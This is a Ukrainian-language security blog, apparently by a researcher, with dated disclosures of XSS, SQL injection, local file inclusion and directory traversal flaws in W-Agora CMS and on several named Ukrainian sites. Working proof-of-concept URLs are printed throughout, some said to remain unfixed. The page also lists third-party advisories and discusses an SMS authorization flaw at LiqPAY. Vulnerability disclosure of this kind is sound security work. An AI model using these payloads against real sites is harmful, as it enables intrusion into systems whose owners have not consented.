Websecurity - Веб безпека

29.08.2010

У серпні, 27.08.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я також виявив на сайті maidan.org.ua, як і попередні уразливості. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.10.2010

XSS:

http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Уразливість працює в версії 4.1.5, але не працює в 4.2.1.

http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

В папці conf:

http://site/news/for-print.php3?bn=1

http://site/news/login.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/for-print.php3?bn=..\1

http://site/news/login.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи скрипти php3 мають розширення php. Якщо адміни maidan.org.ua виправили уразливості, то розробник системи дані уразливості не виправив (але після публікації попередніх дірок в багтреках, розробник схоже почав їх виправляти, як мінімум виправив зазначені XSS на офіційному сайті системи).

В даній добірці уразливості в веб додатках:

• PowerDNS Recursor up to and including 3.1.7.1 can be spoofed into accepting bogus data (деталі)
• PowerDNS Recursor up to and including 3.1.7.1 can be brought down and probably exploited (деталі)
• Critical PowerDNS Recursor Security Vulnerabilities: please upgrade ASAP to 3.1.7.2 (деталі)
• PHPKIT WCMS - Multiple stored Cross Site Scripting Issues (деталі)
• TTVideo 1.0 Joomla Component SQL Injection Vulnerability (деталі)
• Novell Teaming ajaxUploadImageFile Remote Code Execution Vulnerability (деталі)
• Joomla input sanitization errors (XSS) (деталі)
• XSS vulnerability in Spitfire search (деталі)
• XSS vulnerability in Spitfire (деталі)
• LittleCMS vulnerabilities (OpenJDK, Firefox, GIMP, etc. impacted) (деталі)

05.01.2010

У травні, 06.05.2009, я знайшов Insufficient Anti-automation, Cross-Site Scripting та SQL Injection уразливості на сайті http://www.allo.ua (онлайн магазин). Серед XSS є також persistent XSS, які можуть використовуватися для інфікування сайта вірусами. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.officepro.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.10.2010

Insufficient Anti-automation:

http://www.allo.ua/register.php

http://www.allo.ua/forget.php

В формах немає захисту від автоматизованих запитів (капчі).

XSS:

Це single-user persistent XSS (коли користувач залогінений на сайті).

POST запит до сторінки профайла http://www.allo.ua/account.php. Код спрацює на сторінці профайла (поля Имя, Email, Телефон, Адрес 1, Адрес 2, Город/Поселок, Область) та на кожній зовнішній сторінці сайта (поле Имя).

XSS (persistent):

Через поле Имя в профайлі можна провести атаку на сторінках продуктів:

http://www.allo.ua/products/comments/product/
http://www.allo.ua/products/details/product/

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

SQL Injection:

http://www.allo.ua/index.php?page=search&start_do_search=yes&search_text=1&pcat_id=-1%20or%20version()=5

Дані уразливості переважно досі не виправлені. Лише виправили persistent XSS через поле Имя.

05.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості на сайті http://www.lanukr.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

25.10.2010

SQL Injection:

http://www.lanukr.com/?mid=-1%20or%20version()%3E4

http://www.lanukr.com/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://www.lanukr.com/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Виведення .htaccess.

Full path disclosure:

http://www.lanukr.com/?fun=-1

Дані уразливості вже виправлені, за виключенням Full path disclosure. Але дірок на сайті все ще чимало.

В даній добірці уразливості в веб додатках:

• Sprint / Verizon MiFi CSRF+CSS Gives up GPS info to attacker (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• Ref: Session Hijacking iPhone Facebook Application ver 3.1.2 (деталі)
• Facebook for iPhone persistent XSS (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• XSS vulnerability in Theeta CMS (деталі)
• Cisco ASA5520 Web VPN Host Header XSS (деталі)
• Cisco IOS Software WebVPN and SSLVPN Vulnerabilities (деталі)

27.08.2010

У березні, 15.03.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на сайті maidan.org.ua. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.10.2010

XSS:

http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

Можна інклюдити php-файли (з розширенням php3 в версії W-Agora 4.1.5 або з розширенням php в версії 4.2.1).

В папці conf:

http://site/news/search.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/search.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи search.php3 має ім’я search.php. Розробник системи дані уразливості не виправив.

В даній добірці уразливості в веб додатках:

• File Access Vulnerability in Easy File Sharing Web Server (деталі)
• PBBooking 1.0.4_3 Joomla Component Multiple Blind SQL Injection (деталі)
• Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) (деталі)
• PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection (деталі)
• Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass (деталі)
• WhiteBoard 0.1.30 Multiple Blind SQL Injection Vulnerabilities (деталі)
• DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit (деталі)
• XSS vulnerability in SyndeoCMS (деталі)
• SQL injection vulnerability in Theeta CMS (деталі)
• httpdx webserver v1.5 Remote Source Disclosure (деталі)

04.02.2010

У червні, 28.06.2009, я знайшов Full path disclosure та SQL Injection уразливості на проекті http://www.ea-ua.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

20.10.2010

Full path disclosure:

http://www.ea-ua.info/main.php?parts_id=-1&news_id=1

http://www.ea-ua.info/main.php?parts_id=1&news_id=-1

SQL Injection:

http://www.ea-ua.info/main.php?parts_id=6&news_id=-1%20or%20version()=5&news_show_type=1

Дані уразливості досі не виправлені.

Ще в березні, 22.03.2010, Андрій Терещенко повідомив розробникам системи LiqPAY та написав в Bugtraq про уразливість в LiqPAY. Дана уразливість стосується sms-повідомлень для авторизації в системі.

Про уразливості в Приват24 (версія для Facebook), оприлюднені Андрєм в жовтні, я вже писав. Зазначу, що дана уразливість в sms-ках LiqPAY ідентична одній з уразливостей в sms-ках Facebook-версії Приват24. І ПриватБанку варто було виправити дану уразливість в Приват24 для Facebook так само, як вони це зробили в LiqPAY.

Тоді ж він отримав відповідь від ПБ, що вони не вважають це уразливістю. Але вже в березні LiqPAY виправив дану уразливість (хоча від всіх фішинг атак це не захистить). Що я добре знаю, тому що активно використовую дану систему (з листопада 2009 року). Це один з тих рідких випадків, коли ПриватБанк виправив уразливості в своїх сервісах чи сайтах.

11.03.2010 LiqPAY змінили текст sms-ки (додавши пораду не давати пароль іншим особам).
27.03.2010 LiqPAY додали в текст sms-ки адресу сайта.

• Insecure SMS authorization scheme at LiqPAY micro-payments of PrivatBank (Ukraine) (деталі)

03.02.2010

У червні, 28.06.2009, я знайшов SQL Injection уразливість на сайті http://www.dala.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.10.2010

SQL Injection:

http://www.dala.com.ua/index.php?menu_id=-1%20or%20version()=5

Дана уразливість досі не виправлена.